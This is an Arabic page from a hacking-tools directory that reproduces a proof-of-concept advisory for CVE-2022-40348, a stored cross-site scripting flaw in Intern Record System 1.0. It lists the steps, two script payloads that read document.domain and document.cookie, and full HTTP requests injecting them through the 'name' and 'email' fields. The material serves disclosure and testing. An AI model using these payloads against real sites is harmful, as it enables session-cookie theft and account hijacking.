Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated — CVE-2022-40348: نظام سجل المتدربين - برمجة نصية عبر المواقع في 'name' و 'email' (غير مصادق عليه) | Kitploit
أدوات/GitHubGitHub/h4md153v63n/cve-2022-40348_intern-record-system-cross-site-scripting-v1.0-vulnerability-unauthenticated
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubh4md153v63n/cve-2022-40348_intern-record-system-cross-site-scripting-v1.0-vulnerability-unauthenticated

CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated

CVE-2022-40348: نظام سجل المتدربين - برمجة نصية عبر المواقع في 'name' و 'email' (غير مصادق عليه)

عرض المستودع
321منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-40348: نظام تسجيل المتدربين - ثغرة برمجية نصية عبر المواقع (XSS غير مصادق) في 'name' و 'email'

  • عنوان الثغرة: نظام تسجيل المتدربين - ثغرة برمجية نصية عبر المواقع (XSS غير مصادق) في 'name' و 'email'
  • التاريخ: 2022-06-09
  • مؤلف الثغرة: Hamdi Sevben
  • الصفحة الرئيسية للبائع: https://code-projects.org/intern-record-system-in-php-with-source-code/
  • رابط البرنامج: https://download-media.code-projects.org/2020/03/Intern_Record_System_In_PHP_With_Source_Code.zip
  • الإصدار: 1.0
  • تم الاختبار على: Windows 10 Pro + PHP 8.1.6, Apache 2.4.53
  • CVE: CVE-2022-40348

المراجع:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40348
  • https://nvd.nist.gov/vuln/detail/CVE-2022-40348

1. الوصف:

يسمح نظام تسجيل المتدربين Intern Record System 1.0 بثغرة برمجية نصية مخزنة عبر المواقع (Stored XSS) عبر المعاملين 'name' و 'email' في "/intern/controller.php". النظام عرضة لثغرة برمجية نصية عبر المواقع لأنه يفشل في تعقيم بيانات المستخدم بشكل كافٍ. يمكن للمهاجم استغلال هذه المشكلة لتنفيذ كود برمجي عشوائي في متصفح مستخدم غير متوقع في سياق الموقع المتأثر. قد يسمح هذا للمهاجم بسرقة بيانات اعتماد المصادقة القائمة على ملفات تعريف الارتباط وشن هجمات أخرى.

2. إثبات المفهوم:

  • طلب Burpsuite على المعاملين 'name' أو 'email' مع الحمولات على http://localhost/intern/controller.php
  • الانتقال إلى صفحة http://localhost/intern/view.php
  • تحديث الصفحة.
  • سيتم تشغيل XSS.
  • ستظهر نافذة تنبيه.

3. مثال على الحمولة:

  • الحمولة-1: <script>alert(document.domain)</script>
  • الحمولة-2: <script>alert(document.cookie)</script>

4. طلب Burpsuite على المعامل 'name':

  • الحقن:
root@kitploit:~
POST /intern/controller.php HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Content-Length: 78  
Content-Type: application/x-www-form-urlencoded  
Referer: http://localhost/intern/  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36  

name=<script>alert(document.domain)</script>&email=&phone=&deptType=3
  • صفحة التعريف:
root@kitploit:~
GET /intern/view.php HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Referer: http://localhost/intern/controller.php  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36  

5. طلب Burpsuite على المعامل 'email':

  • الحقن:
root@kitploit:~
POST /intern/controller.php HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Content-Length: 153  
Content-Type: application/x-www-form-urlencoded  
Referer: http://localhost/intern/  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36  

name=&email=<script>alert(document.cookie)</script>&phone=&deptType=3  
  • صفحة التعريف:
root@kitploit:~
GET /intern/view.php HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Referer: http://localhost/intern/controller.php  

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36  
تنزيل الأداة